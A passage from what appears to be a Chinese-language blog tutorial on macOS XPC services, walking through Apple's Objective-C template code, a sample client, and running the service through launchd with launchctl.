&lt;Foundation/Foundation.h&gt;</span><br><span class="line"></span><br><span class="line">// The protocol that this service will vend as its API. This header file will also need to be visible to the process hosting the service.</span><br><span class="line">@protocol XPCDemoProtocol</span><br><span class="line"></span><br><span class="line">// Replace the API of this protocol with an API appropriate to the service you are vending.</span><br><span class="line">- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply;</span><br><span class="line">    </span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>protocol 主要用于限制<strong>调用程序</strong>和 <strong>XPC 服务</strong>之间的编程接口。所有<strong>需要在调用程序中调用的方法</strong>必须在 protocol 中指定。需要注意的是：XPC 通信是异步的，因此 protocol 中的方法的返回值都只能是 void，如果需要返回数据则使用<strong>返回块</strong>，即正如上面代码中 <code>upperCaseString</code> 函数的第二个参数，类似于 callback。（<a href="https://www.runoob.com/ios/ios-objective-c.html">什么是块？</a>）</p><h4 id="b-interface">b. interface</h4><p>在<strong>声明</strong>完 protocol 后，我们需要<strong>实现一个描述它的接口</strong>。因此这里的代码声明了 <code>XPCDemo</code> 类，继承自该 protocol：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//  XPCDemo.h</span><br><span class="line"></span><br><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line">#import &quot;XPCDemoProtocol.h&quot;</span><br><span class="line"></span><br><span class="line">// This object implements the protocol which we have defined. It provides the actual behavior for the service. It is &#x27;exported&#x27; by the service to make it available to the process hosting the service over an NSXPCConnection.</span><br><span class="line">@interface XPCDemo : NSObject &lt;XPCDemoProtocol&gt;</span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>并实现类功能：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">//  XPCDemo.m</span><br><span class="line"></span><br><span class="line">#import &quot;XPCDemo.h&quot;</span><br><span class="line"></span><br><span class="line">@implementation XPCDemo</span><br><span class="line"></span><br><span class="line">// This implements the example protocol. Replace the body of this class with the implementation of this service&#x27;s protocol.</span><br><span class="line">- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply &#123;</span><br><span class="line">    NSString *response = [aString uppercaseString];</span><br><span class="line">    reply(response);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>上面的代码主要做了两件事情：</p><ol><li>定义一个 protocol，即远程进程可以调用的函数接口</li><li>创建一个继承自该 protocol 的类，并实现这些函数接口。</li></ol><p>这里的 <code>upperCaseString</code> 函数只做了一件事情：<strong>将传入的字符串全部转换为大写，并调用 callback 将结果返回</strong>。</p><h4 id="c-NSXPCListener">c. NSXPCListener</h4><p>看上去还挺好理解，那就继续看看 main 文件。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">int main(int argc, const char *argv[])</span><br><span class="line">&#123;</span><br><span class="line">    // Create the delegate for the service.</span><br><span class="line">    ServiceDelegate *delegate = [ServiceDelegate new];</span><br><span class="line">    </span><br><span class="line">    // Set up the one NSXPCListener for this service. It will handle all incoming connections.</span><br><span class="line">    NSXPCListener *listener = [NSXPCListener serviceListener];</span><br><span class="line">    listener.delegate = delegate;</span><br><span class="line">    </span><br><span class="line">    // Resuming the serviceListener starts this service. This method does not return.</span><br><span class="line">    [listener resume];</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>main 函数中创建了一个 NSXPCListener 类，并设置 listener 的<strong>委托</strong>，之后执行 resume 函数。</p><p>看上去有点不明觉厉，找了下 <code>NSXPCListener</code> 的类声明：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">// Each NSXPCListener instance has a private serial queue. This queue is used when sending the delegate messages.</span><br><span class="line">API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))</span><br><span class="line">@interface NSXPCListener : NSObject</span><br><span class="line"></span><br><span class="line">// If your listener is an XPCService (that is, in the XPCServices folder of an application or framework), then use this method to get the shared, singleton NSXPCListener object that will await new connections. When the resume method is called on this listener, it will not return. Instead it hands over control to the object and allows it to service the listener as appropriate. This makes it ideal for use in your main() function. For more info on XPCServices, please refer to the developer documentation.</span><br><span class="line">+ (NSXPCListener *)serviceListener;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">// The delegate for the connection listener. If no delegate is set, all new connections will be rejected. See the protocol for more information on how to implement it.</span><br><span class="line">@property (nullable, weak) id &lt;NSXPCListenerDelegate&gt; delegate;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">// All listeners start suspended and must be resumed before they will process incoming requests. If called on the serviceListener, this method will never return. Call it as the last step inside your main function in your XPC service after setting up desired initial state and the listener itself. If called on any other NSXPCListener, the connection is resumed and the method returns immediately.</span><br><span class="line">- (void)resume;</span><br><span class="line"></span><br><span class="line">// Suspend the listener. Suspends must be balanced with resumes before the listener may be invalidated.</span><br><span class="line">- (void)suspend;</span><br><span class="line"></span><br><span class="line">// Invalidate the listener. No more connections will be created. Once a listener is invalidated it may not be resumed or suspended.</span><br><span class="line">- (void)invalidate;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>可以看到，</p><ul><li>对于 XPCService 而言，<code>serviceListener</code> 属性是 XPCService 用于监听 XPC connection 的监听器。</li><li>当有新 XPC 连接到来时，连接将通过所设置的 delegate 进行处理。</li><li>在 XPC Service 初始执行并完成一系列初始化步骤后，调用 listener 的 resume 方法以开始提供 XPC 服务，该方法将<strong>不会返回</strong>。</li></ul><h4 id="d-NSXPCListenerDelegate">d. NSXPCListenerDelegate</h4><p>main 函数现在理解的差不多了，现在研究一下 <code>NSXPCListenerDelegate</code>，以下是它的协议声明：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">@protocol NSXPCListenerDelegate &lt;NSObject&gt;</span><br><span class="line">@optional</span><br><span class="line">// Accept or reject a new connection to the listener. This is a good time to set up properties on the new connection, like its exported object and interfaces. If a value of NO is returned, the connection object will be invalidated after this method returns. Be sure to resume the new connection and return YES when you are finished configuring it and are ready to receive messages. You may delay resuming the connection if you wish, but still return YES from this method if you want the connection to be accepted.</span><br><span class="line">- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>该协议中声明了一个可选实现的 <code>listener</code> 接口。这个接口的参数分别为：</p><ul><li><code>listener</code>：<em><em>NSXPCListener</em> 类型</em>*，</li><li><code>newConnection</code>：<em><em>NSXPCConnection</em> 类型</em>*，新传入的连接</li></ul><p>返回值是 <code>BOOL</code> 类型，可选值为 <code>YES</code> 和 <code>NO</code>。</p><blockquote><p>Objective-C 还有两种布尔类型，分别是 <strong>bool (true, false)</strong> 和 <strong>Boolean (TRUE, FALSE)</strong>。</p></blockquote><p>该函数用于为<strong>新连接</strong>设置属性时所执行的函数，类似于<strong>预</strong>处理。该函数可以<strong>选择接收或者拒绝传入的连接</strong>，并且还可以自由选择什么时候<strong>恢复连接</strong>。我们再来看看该函数默认生成所执行的操作：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">//  main.m</span><br><span class="line"></span><br><span class="line">#import &lt;Foundation/Foundation.h&gt;</span><br><span class="line">#import &quot;XPCDemo.h&quot;</span><br><span class="line"></span><br><span class="line">@interface ServiceDelegate : NSObject &lt;NSXPCListenerDelegate&gt;</span><br><span class="line">@end</span><br><span class="line"></span><br><span class="line">@implementation ServiceDelegate</span><br><span class="line"></span><br><span class="line">- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection &#123;</span><br><span class="line">    // This method is where the NSXPCListener configures, accepts, and resumes a new incoming NSXPCConnection.</span><br><span class="line">    </span><br><span class="line">    // Configure the connection.</span><br><span class="line">    // First, set the interface that the exported object implements.</span><br><span class="line">    newConnection.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCDemoProtocol)];</span><br><span class="line">    </span><br><span class="line">    // Next, set the object that the connection exports. All messages sent on the connection to this service will be sent to the exported object to handle. The connection retains the exported object.</span><br><span class="line">    XPCDemo *exportedObject = [XPCDemo new];</span><br><span class="line">    newConnection.exportedObject = exportedObject;</span><br><span class="line">    </span><br><span class="line">    // Resuming the connection allows the system to deliver more incoming messages.</span><br><span class="line">    [newConnection resume];</span><br><span class="line">    </span><br><span class="line">    // Returning YES from this method tells the system that you have accepted this connection. If you want to reject the connection for some reason, call -invalidate on the connection and return NO.</span><br><span class="line">    return YES;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>该函数将会为每个<strong>新连接</strong>设置其 <strong>exportedInterface</strong> 与 <strong>exportedObject</strong> ，并恢复该连接，换句话说，该函数会在处理连接之前设置传入连接的两个成员。</p><p>至于这种设置是为了什么，我们需要再看看 NSXPCConnection 类的声明，以下是截取出的部分声明：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">// This object is the main configuration mechanism for the communication between two processes. Each NSXPCConnection instance has a private serial queue. This queue is used when sending messages to reply handlers, interruption handlers, and invalidation handlers.</span><br><span class="line">API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))</span><br><span class="line">@interface NSXPCConnection : NSObject &lt;NSXPCProxyCreating&gt;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">// The interface that describes messages that are allowed to be received by the exported object on this connection. This value is required if a exported object is set.</span><br><span class="line">@property (nullable, retain) NSXPCInterface *exportedInterface;</span><br><span class="line"></span><br><span class="line">// Set an exported object for the connection. Messages sent to the remoteObjectProxy from the other side of the connection will be dispatched to this object. Messages delivered to exported objects are serialized and sent on a non-main queue. The receiver is responsible for handling the messages on a different queue or thread if it is required.</span><br><span class="line">@property (nullable, retain) id exportedObject;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">// All connections start suspended. You must resume them before they will start processing received messages or sending messages through the remoteObjectProxy. Note: Calling resume does not immediately launch the XPC service. The service will be started on demand when the first message is sent. However, if the name specified when creating the connection is determined to be invalid, your invalidation handler will be called immediately (and asynchronously) after calling resume.</span><br><span class="line">- (void)resume;</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">@end</span><br></pre></td></tr></table></figure><p>也就是说该函数实际是为<strong>每个新连接</strong>指定了<strong>处理连接的方法</strong>：</p><ul><li><code>exportedInterface</code>：用于描述<strong>应向连接的另一端提供的方法</strong>。</li><li><code>exportedObject</code>：包含一个本地对象，用于<strong>处理来自连接另一端的方法调用</strong></li></ul><p>当应用程序调用 NSXPCConnection 上代理的方法时，应用程序的 NSXPCCoonnection 将调用存储在 exportedObject 类上的目标方法，即实现远程进程调用。</p><h4 id="e-Info-plist">e. Info.plist</h4><p><code>Info.plist</code> 在 XPC Service 中承担着较为重要的一部分。XPC Service 要求在 Info.plist 中指定一些特殊的<strong>键值对</strong>，以下是其中的一些类型：</p><ul><li><p><strong>CFBundleIdentifier</strong>：指定当前 XPC Service 的反向 DNS 样式的<strong>服务名称字符串</strong>。应用程序将通过这串 BundleID 来访问 XPC 服务。</p><blockquote><p>还记得创建 XPC 服务项目时指定的 Bundle ID 么 :)</p></blockquote></li><li><p><strong>CFBundlePackageType</strong>：一个指定 Bundle Package 类型的字符串，XPC Service 中必须是 <code>XPC!</code></p></li><li><p><strong>XPCService</strong>：一个字典</p><ul><li><code>EnvironmentVariables</code>：字典类型，用于指定 XPC 服务运行时的环境变量。</li><li><code>JoinExistingSession</code>：布尔值，表示 XPC 服务是否与调用方在<strong>同一个安全会话</strong>中运行。</li><li><code>RunLoopType</code>：字符串，用于指定服务的 runloop 类型，默认是 <code>dispatch_main</code>；还有一种是 <code>NSRunLoop</code>。</li></ul></li></ul><h3 id="3-Client-简单示例">3. Client 简单示例</h3><p>现在我们已经可以让 XPC Service 跑起来了，现在需要编写一个程序来使用 XPC Service。XPC Service 默认模板中提供了如下的 client 代码，它将发送一串字符给 XPC service 并将返回的结果输出：</p><ul><li><p>创建 XPC 连接：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">NSXPCConnection *_connectionToService = [[NSXPCConnection alloc] initWithServiceName:@&quot;io.kiprey.github.XPCDemo&quot;];</span><br><span class="line">_connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCDemoProtocol)];</span><br><span class="line">[_connectionToService resume];</span><br></pre></td></tr></table></figure></li><li><p>发送请求</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">[[_connectionToService remoteObjectProxy] upperCaseString:@&quot;hello&quot; withReply:^(NSString *aString) &#123;</span><br><span class="line">    // We have received a response. Update our text field, but do it on the main thread.</span><br><span class="line">    NSLog(@&quot;Result string was: %@&quot;, aString);</span><br><span class="line">&#125;];</span><br></pre></td></tr></table></figure></li><li><p>在<strong>不需要连接时</strong>再来断开连接</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[_connectionToService invalidate];</span><br></pre></td></tr></table></figure></li></ul><p>正如代码所示，</p><ol><li><p>Client 会使用 XPC Service 中的 Bundle ID 来查找并与 XPC Service 建立连接。</p></li><li><p>之后 Client 指定了 <code>remoteObjectInterface</code> 属性，以规范调用接口的类型。</p></li><li><p>接下来，恢复 XPC 连接，并通过 <code>NSXPCConnection</code> 对象中的 <code>remoteObjectProxy</code> 属性，<strong>间接且透明</strong>的调用 XPC Service 上的接口。当XPC Service 完成服务后，返回的信息会被异步输出至控制台。</p></li><li><p>最后，关闭 XPC 连接。</p></li></ol><h3 id="4-启动-XPC-Service-Client">4. 启动 XPC Service &amp; Client</h3><p>需要特别说明一下如何使用 XPC Service，并让 Client 成功连接上（这个绕了我半天）。</p><h4 id="a-局部-XPC-Service">a. 局部 XPC Service</h4><blockquote><p>即，将 XPC Service 内嵌进 App 中。</p></blockquote><p>首先，建立一个 App：</p><blockquote><p>坑点：<strong>不能是 Command Line Tool</strong> 。</p><p>因为 Command Line Tool 不具有类似 App 的结构，因此无法托管 XPC Service。</p></blockquote><p><img src="/2022/01/mach_xpc_intro/image-20220104171022403.png" alt="image-20220104171022403"></p><p>之后，在接下来这个界面中<strong>选一个 Language 为 Objective-C</strong> 的 Interface，Interface 是 GUI 相关的暂时不用管：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104171411076.png" alt="image-20220104171411076"></p><p>项目创建后，选择 <code>File -&gt; New -&gt; Target</code>，新建一个 <code>XPC Service</code>。注意到在新建的最后一步中会有一个 <code>Embed in Application</code>选项：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104171917464.png" alt="image-20220104171917464"></p><p>这样，这个新建的 XPC Service 就会被内置进这个 Application 中：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104172028284.png" alt="image-20220104172028284"></p><p>之后，为了简单，我们直接将 <code>main.m</code> 中的原始代码：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">#import &lt;Cocoa/Cocoa.h&gt;</span><br><span class="line"></span><br><span class="line">int main(int argc, const char * argv[]) &#123;</span><br><span class="line">    </span><br><span class="line">    @autoreleasepool &#123;</span><br><span class="line">        // Setup code that might create autoreleased objects goes here.</span><br><span class="line">    &#125;</span><br><span class="line">    return NSApplicationMain(argc, argv);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>替换成如下调用 XPC 服务的代码，简单粗暴：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">#import &quot;XPCServiceProtocol.h&quot;</span><br><span class="line"></span><br><span class="line">int main(int argc, const char * argv[]) &#123;</span><br><span class="line">    // Try connect to XPC Service</span><br><span class="line">    NSXPCConnection* _connectionToService = [[NSXPCConnection alloc] initWithServiceName:@&quot;io.github.kiprey.XPCService&quot;];</span><br><span class="line">    _connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCServiceProtocol)];</span><br><span class="line">    [_connectionToService resume];</span><br><span class="line">    </span><br><span class="line">    // Try using XPC Service interface</span><br><span class="line">    [[_connectionToService remoteObjectProxy] upperCaseString:@&quot;hello&quot; withReply:^(NSString *aString) &#123;</span><br><span class="line">        // We have received a response. Update our text field, but do it on the main thread.</span><br><span class="line">        NSLog(@&quot;Result string was: %@&quot;, aString);</span><br><span class="line">    &#125;];</span><br><span class="line">    </span><br><span class="line">    // Wait for XPC Service response</span><br><span class="line">    NSLog(@&quot;Sleep 5s...&quot;);</span><br><span class="line">    sleep(5);</span><br><span class="line">    </span><br><span class="line">    [_connectionToService invalidate];</span><br><span class="line">    </span><br><span class="line">    NSLog(@&quot;Bye.&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>需要注意的是：当调用者向 XPC Service 请求服务后，由于<strong>请求是异步执行</strong>的，因此执行到程序末尾后<strong>可能调用者还没有接收到 XPC Service 的返回结果</strong>，此时<strong>调用者需要等待</strong>，<strong>千万不能</strong>立即调用 <code>invalidate</code> 方法。</p><blockquote><p>调用 <code>invalidate</code> 方法将会立即终止连接，不会等到 XPC Service 返回信息后再终止连接。</p></blockquote><p>之后<strong>先编译 XPCService</strong>，再编译 Client。以下是执行结果：</p><p><img src="/2022/01/mach_xpc_intro/image-20220104180112370.png" alt="image-20220104180112370"></p><h4 id="b-全局-XPC-Service">b. 全局 XPC Service</h4><p>上面那种方法简单说明了如何将 XPC Service 内嵌进 App 中并使用，启动和管理也较为方便。</p><p>但要是希望生成的 XPC Service 可以被任意程序调用，那该如何启动？</p><p>首先，编写一个 <code>XPCDemo.plist</code>，这种编写的 plist 称之为 <strong>launchd.plist</strong>。内容如下：</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">plist</span> <span class="keyword">PUBLIC</span> <span class="string">&quot;-//Apple//DTD PLIST 1.0//EN&quot;</span> <span class="string">&quot;http://www.apple.com/DTDs/PropertyList-1.0.dtd&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">plist</span> <span class="attr">version</span>=<span class="string">&quot;1.0&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">dict</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>Label<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">string</span>&gt;</span>io.kiprey.github.XPCDemo<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>Program<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">string</span>&gt;</span>/Users/kiprey/Desktop/Mach_test/XPCDemo/Build/Products/Debug/XPCDemo.xpc/Contents/MacOS/XPCDemo<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>KeepAlive<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">true</span>/&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>POSIXSpawnType<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">string</span>&gt;</span>Interactive<span class="tag">&lt;/<span class="name">string</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">key</span>&gt;</span>MachServices<span class="tag">&lt;/<span class="name">key</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">dict</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dict</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">plist</span>&gt;</span></span><br></pre></td></tr></table></figure><p>其中指定了：</p><ol><li><code>Label</code>：<strong>即其他进程用于索引当前 XPC Service 的标签</strong></li><li><code>Program</code>：待被启动的守护进程的路径</li><li><code>KeepAlive</code>：表示是否需要让 launchd 在该守护进程崩溃后重启</li><li>…</li></ol><blockquote><p>更多关于 lanchd.plist 的细节可以在 <code>man launchd.plist</code> 文档中找到，这里不再赘述。</p></blockquote><p>之后，我们可以<strong>让 launchd 来启动并管理我们的 XPC Service</strong>。</p><p>原先是想将 <code>XPCDemo.plist</code> 文件拷贝进 <code>/System/Library/LaunchDaemons</code> 文件夹下，但是执行 cp 操作时，提示 <code>Read-only file system</code>，即该目标文件夹不允许写入操作。无论是关闭 SIP 还是执行<code>sudo mount -uw /</code> 以修改根路径的挂载权限，都无法写入该文件夹下。其他方式也不想再折腾了，因此放弃将该 plist 文件拷贝进 System Launch Daemons 文件夹的打算。</p><blockquote><p>这种错误可能是因为目标文件夹是 <code>/System</code> 打头的路径。</p><p>但我们仍然可以将 plist 复制进 <code>/Library/LaunchDaemons</code> 文件夹中。</p></blockquote><p>但即便我们不将 plist 文件复制进 Launch Daemons 文件夹下，我们依然可以让 launchd 来启动我们的 XPC Service：</p><ul><li><p>首先，执行 <code>chown</code> 修改刚刚创建的 <code>XPCDemo.plist</code> 文件所有权</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> <span class="built_in">chown</span> root:wheel XPCDemo.plist</span><br></pre></td></tr></table></figure></li><li><p>之后执行以下命令，使 launchd 启动目标程序</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo launchctl bootstrap system XPCDemo.plist</span><br></pre></td></tr></table></figure></li><li><p>当我们希望 launchd 关闭目标 XPC Service 时，执行以下命令</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo launchctl bootout system XPCDemo.plist</span><br></pre></td></tr></table></figure></li></ul><p>当 launchd 开始管理我们的全局 XPC Service 后，如果该 XPC Service 异常崩溃，则 launchd 会每隔 10s 重启一次服务：</p><blockquote><p>图中是之前测试时，XPCDemo 老是一开就挂，因此 Launchd 会每隔 10s 重启一次，并且一直重启下去。</p><p>log 查看命令：<code>log show --predicate 'processID == 0' --last 1h | grep &quot;XPC&quot;</code></p></blockquote><p><img src="/2022/01/mach_xpc_intro/image-20220104202227521.png" alt="image-20220104202227521"></p><p>需要注意的是，单独使用 XCode 的 XPC Service 项目编译出的程序无法直接执行，因此不能挂在 launchd 下面跑，必须参照 <a href="https://developer.apple.com/documentation/xcode/signing-a-daemon-with-a-restricted-entitlement">Signing a Daemon with a Restricted Entitlement</a> 将 XPC Service 以<strong>类 app 形式</strong>编译出一个可执行文件来。</p><h3 id="5-NSXPC-架构">5. NSXPC 架构</h3><p>查看下面这张图，我们可以看到上面 <code>[ServiceDelegate listener]</code> 函数所做的就是设置 NSXPC Service 这方的 <code>Exported Object</code>。</p><p><img src="/2022/01/mach_xpc_intro/NSXPC_intro_2x.png" alt="img"></p><p>而这张图说明了整个 XPC 通信的过程：</p><p><img src="/2022/01/mach_xpc_intro/NSXPC_connection_2x.png" alt="img"></p><h2 id="三、C-Stype-XPC-Service">三、C-Stype XPC Service</h2><p>当我们可以理解 Objective-C 的 XPC Service 后，C 风格的 XPC Service 也就更容易理解。</p><p>具体细节就不再赘述了，这里贴出两个 C-Stype XPC 的相关资料：</p><ul><li><a href="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW28">Using the C XPC Services API - Apple Documentation Archive</a></li><li><code>man xpc</code></li></ul><h2 id="四、参考">四、参考</h2><ul><li><a href="https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1">Creating XPC Services - Apple Documentation Archive</a></li><li><a href="https://www.runoob.com/ios/ios-objective-c.html">Objective-C 入门 - 菜鸟教程</a></li><li><a href="https://en.wikipedia.org/wiki/Blocks_(C_language_extension)">Blocks (C language extension) - Wikipedia</a></li><li><a href="https://objccn.io/issue-14-4/">XPC - ObjC 中国</a></li><li><a href="https://developer.apple.com/forums/thread/656817">How to use XPC in command line app - Apple Development Forums</a></li><li><a href="https://developer.apple.com/documentation/xcode/signing-a-daemon-with-a-restricted-entitlement">Signing a Daemon with a Restricted Entitlement - Apple Development Documentation</a></li><li><a href="https://support.apple.com/zh-cn/guide/terminal/apdc6c1077b-5d5d-4d35-9c19-60f2397b2369/mac">在 Mac 上的“终端”中使用 launchd 管理脚本 -  Apple Development Documentation</a></li><li>MacOS Manual Page</li><li><a href="http://technologeeks.com/docs/launchd.pdf">Launchd.pdf - Jonathan Levin</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;XPC 是一种 OS X &lt;strong&gt;进程间通信技术&lt;/strong&gt;，通过&lt;strong&gt;权限分离&lt;/strong&gt;机制来对&lt;strong&gt;应用沙箱机制&lt;/strong&gt;做了一个补充。其中，&lt;strong&gt;权限分离&lt;/strong&gt;是根据每个部分所需的系统资源访问&lt;strong&gt;将应用程序分成多个部分&lt;/strong&gt;，每个部分可以&lt;strong&gt;使用提前声明的权限（沙箱）&lt;/strong&gt;。这种单个组件称为&lt;strong&gt;XPC 服务&lt;/strong&gt;。&lt;/p&gt;
